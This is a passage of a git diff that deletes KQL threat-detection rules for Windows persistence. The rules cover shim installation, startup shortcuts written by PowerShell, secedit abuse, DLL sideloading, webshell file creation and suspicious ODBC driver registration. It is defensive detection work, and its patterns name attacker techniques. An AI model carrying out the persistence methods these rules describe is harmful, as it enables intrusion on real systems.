-| where RegistryKey contains "\\shell\\SentinelOneScan\\command" and (not(((InitiatingProcessFolderPath endswith "C:\\Program Files\\SentinelOne\\" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\SentinelOne\\") or (RegistryValueData contains "\\SentinelScanFromContextMenu.exe" and (RegistryValueData startswith "C:\\Program Files\\SentinelOne\\Sentinel Agent" or RegistryValueData startswith "C:\\Program Files (x86)\\SentinelOne\\Sentinel Agent")))))
\ No newline at end of file
diff --git a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql b/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
deleted file mode 100644
index 56927dce..00000000
--- a/Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects installation of a new shim using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".sdb" and (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe")) and (not(((ProcessCommandLine contains ":\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb" or ProcessCommandLine contains ":\\Program Files\\IIS Express\\iisexpressshim.sdb") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))
\ No newline at end of file
diff --git a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql b/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql
deleted file mode 100644
index 8729ce64..00000000
--- a/Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE
-// Date: 2021/10/24
-// Level: high
-// Description: Detects PowerShell writing startup shortcuts.
-This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
-Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
-In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
-
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql b/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql
deleted file mode 100644
index 9bfc80e6..00000000
--- a/Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.ps") or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath contains "\\.dll")
\ No newline at end of file
diff --git a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
deleted file mode 100644
index 1884165c..00000000
--- a/Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql b/Persistence/Potential_Webshell_Creation_On_Static_Website.kql
deleted file mode 100644
index 77f667ad..00000000
--- a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
-// Date: 2019/10/22
-// Level: medium
-// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
-// Tags: attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql b/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql
deleted file mode 100644
index 3ba6f4bf..00000000
--- a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/23
-// Level: high
-// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
-// Tags: attack.persistence, attack.t1003
-DeviceRegistryEvents
-| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")
\ No newline at end of file
diff --git a/Persistence/PowerShell_Module_File_Created.kql b/Persistence/PowerShell_Module_File_Created.kql
deleted file mode 100644
index f5d07da1..00000000
--- a/Persistence/PowerShell_Module_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: low
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
-// Tags: attack.persistence
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql b/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql
deleted file mode 100644
index 089c2a85..00000000
--- a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: medium
